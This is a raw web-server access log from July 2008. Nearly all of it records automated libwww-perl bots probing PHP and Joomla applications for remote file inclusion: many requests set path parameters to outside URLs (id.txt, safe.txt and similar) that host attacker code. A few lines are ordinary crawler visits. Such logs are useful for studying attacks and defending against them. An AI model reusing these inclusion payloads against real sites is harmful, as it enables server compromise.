195.56.111.194 - - [02/Jul/2008:19:34:25 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 366 "-""libwww-perl/5.810"
91.200.212.3 - - [02/Jul/2008:19:35:32 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 371 "-""libwww-perl/5.79"
91.200.212.3 - - [02/Jul/2008:19:35:32 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 366 "-""libwww-perl/5.79"
65.49.13.112 - - [02/Jul/2008:19:37:31 -0500] "GET /logs/index.php3?act=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
65.49.13.112 - - [02/Jul/2008:19:37:31 -0500] "GET /logs/index.php3?act=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
65.49.13.112 - - [02/Jul/2008:19:37:31 -0500] "GET /index.php3?act=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
65.49.13.112 - - [02/Jul/2008:19:37:31 -0500] "GET /index.php3?act=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
200.101.231.12 - - [02/Jul/2008:19:37:45 -0500] "GET /logs/main.php5?page=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
190.47.128.110 - - [02/Jul/2008:19:37:53 -0500] "GET /logs//modules/My_eGallery/index.php?basepath=http://alieandrann.net/id.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.803"
200.101.231.12 - - [02/Jul/2008:19:37:54 -0500] "GET /main.php5?page=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
190.47.128.110 - - [02/Jul/2008:19:37:59 -0500] "GET //modules/My_eGallery/index.php?basepath=http://alieandrann.net/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
65.55.208.137 - - [02/Jul/2008:19:38:59 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.137 - - [02/Jul/2008:19:38:59 -0500] "GET /logs/access_log.1155945600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
87.230.35.101 - - [02/Jul/2008:19:40:18 -0500] "GET /logs/main.php3?act=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
87.230.35.101 - - [02/Jul/2008:19:40:18 -0500] "GET /main.php3?act=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
201.245.12.66 - - [02/Jul/2008:19:40:49 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 357 "-""libwww-perl/5.76"
201.245.12.66 - - [02/Jul/2008:19:40:49 -0500] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 352 "-""libwww-perl/5.76"
205.134.229.171 - - [02/Jul/2008:19:44:39 -0500] "GET /logs//in_smf_functions.php?prefix=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.812"
205.134.229.171 - - [02/Jul/2008:19:44:40 -0500] "GET //in_smf_functions.php?prefix=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.812"
201.245.12.66 - - [02/Jul/2008:19:44:54 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 369 "-""libwww-perl/5.76"
201.245.12.66 - - [02/Jul/2008:19:44:54 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 364 "-""libwww-perl/5.76"
217.16.26.124 - - [02/Jul/2008:19:45:20 -0500] "GET /logs//?pg=http://alaskafamily.net/poll/id.txt??? HTTP/1.1" 200 89857 "-""libwww-perl/5.810"
217.16.26.124 - - [02/Jul/2008:19:45:20 -0500] "GET //?pg=http://alaskafamily.net/poll/id.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
217.16.26.124 - - [02/Jul/2008:19:45:22 -0500] "GET /logs//?pg=http://alaskafamily.net/poll/id.txt??? HTTP/1.1" 200 89857 "-""libwww-perl/5.810"
217.16.26.124 - - [02/Jul/2008:19:45:22 -0500] "GET //?pg=http://alaskafamily.net/poll/id.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
210.245.120.73 - - [02/Jul/2008:19:45:34 -0500] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.79"
210.245.120.73 - - [02/Jul/2008:19:45:35 -0500] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
65.49.13.112 - - [02/Jul/2008:19:45:48 -0500] "GET /logs/main.php3?act=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
65.49.13.112 - - [02/Jul/2008:19:45:48 -0500] "GET /logs/main.php3?act=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
65.49.13.112 - - [02/Jul/2008:19:45:48 -0500] "GET /main.php3?act=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
65.49.13.112 - - [02/Jul/2008:19:45:49 -0500] "GET /main.php3?act=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
201.245.12.66 - - [02/Jul/2008:19:49:48 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 371 "-""libwww-perl/5.76"
201.245.12.66 - - [02/Jul/2008:19:49:49 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 366 "-""libwww-perl/5.76"
62.112.193.46 - - [02/Jul/2008:19:51:49 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.btcashatclosing.com/listmessenger/public/files/ids.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
62.112.193.46 - - [02/Jul/2008:19:51:49 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.btcashatclosing.com/listmessenger/public/files/ids.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
217.16.26.124 - - [02/Jul/2008:19:54:02 -0500] "GET /logs//?p=http://alaskafamily.net/poll/id.txt??? HTTP/1.1" 200 89857 "-""libwww-perl/5.810"
217.16.26.124 - - [02/Jul/2008:19:54:02 -0500] "GET //?p=http://alaskafamily.net/poll/id.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
150.101.24.140 - - [02/Jul/2008:19:56:32 -0500] "GET /logs/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.idols.m23.ru/id.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
150.101.24.140 - - [02/Jul/2008:19:56:32 -0500] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.idols.m23.ru/id.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
217.16.26.124 - - [02/Jul/2008:19:56:36 -0500] "GET /logs//?p=http://alaskafamily.net/poll/id.txt??? HTTP/1.1" 200 89857 "-""libwww-perl/5.810"
217.16.26.124 - - [02/Jul/2008:19:56:36 -0500] "GET //?p=http://alaskafamily.net/poll/id.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
72.232.216.162 - - [02/Jul/2008:20:08:42 -0500] "GET /logs/access_log.1194048000/index.php?go=http://warcrew.by.ru/t.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
72.232.216.162 - - [02/Jul/2008:20:08:43 -0500] "GET /index.php?go=http://warcrew.by.ru/t.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
72.232.216.162 - - [02/Jul/2008:20:08:43 -0500] "GET /logs/index.php?go=http://warcrew.by.ru/t.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
72.232.216.162 - - [02/Jul/2008:20:09:11 -0500] "GET /logs/access_log.1182038400/index.php?go=http://warcrew.by.ru/t.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
87.106.189.38 - - [02/Jul/2008:20:09:24 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
87.106.189.38 - - [02/Jul/2008:20:09:24 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
87.106.189.38 - - [02/Jul/2008:20:09:25 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
87.106.189.38 - - [02/Jul/2008:20:09:25 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
85.88.12.74 - - [02/Jul/2008:20:09:37 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.803"
85.88.12.74 - - [02/Jul/2008:20:09:37 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.803"
85.88.12.74 - - [02/Jul/2008:20:09:41 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.803"
85.88.12.74 - - [02/Jul/2008:20:09:42 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.803"
85.88.12.74 - - [02/Jul/2008:20:14:03 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 349 "-""libwww-perl/5.803"
85.88.12.74 - - [02/Jul/2008:20:14:03 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 344 "-""libwww-perl/5.803"
87.106.189.38 - - [02/Jul/2008:20:14:08 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 349 "-""libwww-perl/5.79"
87.106.189.38 - - [02/Jul/2008:20:14:08 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 344 "-""libwww-perl/5.79"
85.88.12.74 - - [02/Jul/2008:20:14:15 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 349 "-""libwww-perl/5.803"
85.88.12.74 - - [02/Jul/2008:20:14:15 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 344 "-""libwww-perl/5.803"
87.106.189.38 - - [02/Jul/2008:20:14:22 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 349 "-""libwww-perl/5.79"
87.106.189.38 - - [02/Jul/2008:20:14:22 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 344 "-""libwww-perl/5.79"
190.47.128.110 - - [02/Jul/2008:20:16:25 -0500] "GET /logs//index.php?pagina=http://alieandrann.net/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
217.16.26.124 - - [02/Jul/2008:20:16:28 -0500] "GET /logs/start.php?s=http://alaskafamily.net/poll/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
217.16.26.124 - - [02/Jul/2008:20:16:29 -0500] "GET /start.php?s=http://alaskafamily.net/poll/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
190.47.128.110 - - [02/Jul/2008:20:16:30 -0500] "GET //index.php?pagina=http://alieandrann.net/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.200.212.3 - - [02/Jul/2008:20:16:40 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
91.200.212.3 - - [02/Jul/2008:20:16:40 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
210.240.12.14 - - [02/Jul/2008:20:16:47 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 345 "-""libwww-perl/5.803"
210.240.12.14 - - [02/Jul/2008:20:16:47 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 340 "-""libwww-perl/5.803"
195.56.111.194 - - [02/Jul/2008:20:17:28 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 345 "-""libwww-perl/5.810"
195.56.111.194 - - [02/Jul/2008:20:17:28 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 340 "-""libwww-perl/5.810"
217.16.26.124 - - [02/Jul/2008:20:17:52 -0500] "GET /logs/start.php?s=http://alaskafamily.net/poll/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
217.16.26.124 - - [02/Jul/2008:20:17:52 -0500] "GET /start.php?s=http://alaskafamily.net/poll/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
80.93.62.99 - - [02/Jul/2008:20:20:34 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
80.93.62.99 - - [02/Jul/2008:20:20:34 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
201.245.12.66 - - [02/Jul/2008:20:20:59 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 345 "-""libwww-perl/5.76"
201.245.12.66 - - [02/Jul/2008:20:21:00 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 340 "-""libwww-perl/5.76"
217.160.200.228 - - [02/Jul/2008:20:22:30 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.idols.m23.ru/id.txt? HTTP/1.1" 404 349 "-""libwww-perl/5.803"
217.160.200.228 - - [02/Jul/2008:20:22:30 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.idols.m23.ru/id.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.803"
210.240.12.14 - - [02/Jul/2008:20:22:44 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 349 "-""libwww-perl/5.803"
210.240.12.14 - - [02/Jul/2008:20:22:44 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 344 "-""libwww-perl/5.803"
64.83.0.42 - - [02/Jul/2008:20:23:54 -0500] "GET /logs/access_log.1207785600//?basepath=http://queb3.info/cruise/tanii?????? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
64.83.0.42 - - [02/Jul/2008:20:23:54 -0500] "GET //?basepath=http://queb3.info/cruise/tanii?????? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
64.83.0.42 - - [02/Jul/2008:20:23:55 -0500] "GET /logs//?basepath=http://queb3.info/cruise/tanii?????? HTTP/1.1" 200 89857 "-""libwww-perl/5.805"
201.245.12.66 - - [02/Jul/2008:20:27:51 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 349 "-""libwww-perl/5.76"
201.245.12.66 - - [02/Jul/2008:20:27:52 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 344 "-""libwww-perl/5.76"
212.34.140.215 - - [02/Jul/2008:20:28:17 -0500] "GET /logs//include.php?path[docroot]=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
212.34.140.215 - - [02/Jul/2008:20:28:17 -0500] "GET //include.php?path[docroot]=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 296 "-""libwww-perl/5.803"
87.106.101.24 - - [02/Jul/2008:20:30:15 -0500] "GET /logs//include.php?path[docroot]=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
87.106.101.24 - - [02/Jul/2008:20:30:15 -0500] "GET //include.php?path[docroot]=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
190.47.128.110 - - [02/Jul/2008:20:32:27 -0500] "GET /logs//index.php?pagina=http://alieandrann.net/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
190.47.128.110 - - [02/Jul/2008:20:32:31 -0500] "GET //index.php?pagina=http://alieandrann.net/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
194.143.183.8 - - [02/Jul/2008:20:33:21 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.idols.m23.ru/id.txtt? HTTP/1.1" 404 349 "-""libwww-perl/5.79"
194.143.183.8 - - [02/Jul/2008:20:33:21 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.idols.m23.ru/id.txtt? HTTP/1.1" 404 344 "-""libwww-perl/5.79"
202.221.143.111 - - [02/Jul/2008:20:34:31 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
202.221.143.111 - - [02/Jul/2008:20:34:31 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.65"
200.29.4.54 - - [02/Jul/2008:20:38:12 -0500] "GET /logs//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 351 "-""libwww-perl/5.79"
200.29.4.54 - - [02/Jul/2008:20:38:12 -0500] "GET //components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 346 "-""libwww-perl/5.79"
150.101.24.140 - - [02/Jul/2008:20:43:19 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.idols.m23.ru/id.txt? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
150.101.24.140 - - [02/Jul/2008:20:43:20 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.idols.m23.ru/id.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
74.6.18.227 - - [02/Jul/2008:20:44:05 -0500] "GET /logs/access_log.1199232000 HTTP/1.0" 200 188386 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.53.39.34 - - [02/Jul/2008:20:44:08 -0500] "GET /logs/ktmlpro100/includes/ktedit/toolbar.php?dirDepth=http://barefootscience.com/usa/mambots/id.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
74.53.39.34 - - [02/Jul/2008:20:44:08 -0500] "GET /ktmlpro100/includes/ktedit/toolbar.php?dirDepth=http://barefootscience.com/usa/mambots/id.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
68.49.49.163 - - [02/Jul/2008:20:45:45 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
66.249.73.43 - - [02/Jul/2008:20:55:23 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.43 - - [02/Jul/2008:20:55:23 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
193.254.241.12 - - [02/Jul/2008:20:58:33 -0500] "GET /logs/htmltonuke.php?filnavn=http://alaskafamily.net/poll/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
193.254.241.12 - - [02/Jul/2008:20:58:34 -0500] "GET /htmltonuke.php?filnavn=http://alaskafamily.net/poll/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
193.254.241.12 - - [02/Jul/2008:20:58:35 -0500] "GET /logs/htmltonuke.php?filnavn=http://alaskafamily.net/poll/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
193.254.241.12 - - [02/Jul/2008:20:58:36 -0500] "GET /htmltonuke.php?filnavn=http://alaskafamily.net/poll/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
200.101.231.12 - - [02/Jul/2008:21:01:00 -0500] "GET /logs/main.php3?act=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
200.101.231.12 - - [02/Jul/2008:21:01:06 -0500] "GET /main.php3?act=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
65.49.13.112 - - [02/Jul/2008:21:02:15 -0500] "GET /logs/main.php3?act=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
65.49.13.112 - - [02/Jul/2008:21:02:15 -0500] "GET /logs/main.php3?act=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
65.49.13.112 - - [02/Jul/2008:21:02:15 -0500] "GET /main.php3?act=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
65.49.13.112 - - [02/Jul/2008:21:02:15 -0500] "GET /main.php3?act=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
65.214.44.28 - - [02/Jul/2008:21:04:23 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""-"
65.214.44.28 - - [02/Jul/2008:21:04:24 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
85.234.133.173 - - [02/Jul/2008:21:05:48 -0500] "GET /logs/access_log.1207785600//include.php?path[docroot]=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.811"
85.234.133.173 - - [02/Jul/2008:21:05:49 -0500] "GET //include.php?path[docroot]=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.811"
85.234.133.173 - - [02/Jul/2008:21:05:49 -0500] "GET /logs//include.php?path[docroot]=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.811"
85.234.133.173 - - [02/Jul/2008:21:05:50 -0500] "GET /logs/access_log.1207785600//include.php?path[docroot]=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.811"
85.234.133.173 - - [02/Jul/2008:21:05:50 -0500] "GET //include.php?path[docroot]=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.811"
85.234.133.173 - - [02/Jul/2008:21:05:50 -0500] "GET /logs//include.php?path[docroot]=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.811"
85.88.12.74 - - [02/Jul/2008:21:08:25 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
85.88.12.74 - - [02/Jul/2008:21:08:25 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
85.88.12.74 - - [02/Jul/2008:21:08:25 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
85.88.12.74 - - [02/Jul/2008:21:08:25 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
74.53.39.34 - - [02/Jul/2008:21:09:47 -0500] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://barefootscience.com/usa/mambots/id.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
74.53.39.34 - - [02/Jul/2008:21:09:47 -0500] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://barefootscience.com/usa/mambots/id.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
210.240.12.14 - - [02/Jul/2008:21:13:28 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
210.240.12.14 - - [02/Jul/2008:21:13:29 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
190.47.128.110 - - [02/Jul/2008:21:18:24 -0500] "GET /logs//index.php?pagina=http://alieandrann.net/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
190.47.128.110 - - [02/Jul/2008:21:18:26 -0500] "GET //index.php?pagina=http://alieandrann.net/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
89.108.67.131 - - [02/Jul/2008:21:28:14 -0500] "GET /logs//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://tarana.co.nz/gallely/includes/ons.txt? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
